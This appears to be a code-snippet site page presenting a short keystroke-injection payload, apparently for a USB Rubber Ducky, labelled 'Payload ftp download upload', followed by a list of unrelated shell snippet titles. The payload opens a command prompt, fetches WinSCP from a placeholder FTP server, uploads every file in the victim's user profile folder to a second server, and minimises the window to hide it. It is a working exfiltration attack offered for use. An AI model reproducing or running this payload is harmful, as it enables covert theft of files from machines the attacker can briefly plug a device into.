Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

Payload ftp download upload

GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
STRING ftp -i SERVER
ENTER
DELAY 800
STRING USERNAME
ENTER
STRING PASSWORD
ENTER
STRING GET WinSCP.com
ENTER
DELAY 200
STRING GET WinSCP.exe
ENTER
DELAY 3000
STRING quit
ENTER
REM FTP user only needs write access.
STRING WinSCP.com /command "option batch abort" "option confirm off" "open ftp://USERNAME2:PASSWORD2@SERVER2" "put *.*" "close" "exit"
ENTER
ALT SPACE
STRING N
Comment

PREVIOUS NEXT
Code Example
Shell :: envsub file 
Shell :: sed add new lines using a pattern 
Shell :: connect as super user 
Shell :: nc + bash 
Shell :: Using sed to find and replace complex string (preferrably with regex) 
Shell :: powershell or bash 
Shell :: how to increase the resources allocated to windows subsystem linux 
Shell :: grep contains two strings 
Shell :: bind mac to AD via JAMF with policy* 
Shell :: linux split image into 4 parts 
Shell :: windows command count output lines 
Shell :: run zip command in powershell 
Shell :: how to update github cil on windows 
Shell :: output and error redirection in linux 
Shell :: insert csv to hive table 
Shell :: column cut linu 
Shell :: git preview pull 
Shell :: yarn <pre00h00m00s 0/0: : ERROR: There are no scenarios; must have at least one. </pre 
Shell :: use lines from file for bash command 
Shell :: Guardar cambios en una rama nueva 
Shell :: capitalize first letter in bash 
Shell :: GOOGLE_CREDENTIALS to the terraform Cloud workspace 
Shell :: DISABLE_DATABASE_ENVIRONMENT_CHECK=1 
Shell :: nuget password private source 
Shell :: command to know wifi ubuntu running 64 or 32 bits 
Shell :: install discord on a script 
Shell :: Add Git Branch Name to Terminal Prompt (zsh) 
Shell :: anbox install libhoudini 
Shell :: fix nvidia drivers 
Shell :: cups disable and reneable a printer 
ADD CONTENT
Topic
Content
Source link
Name
4+2 =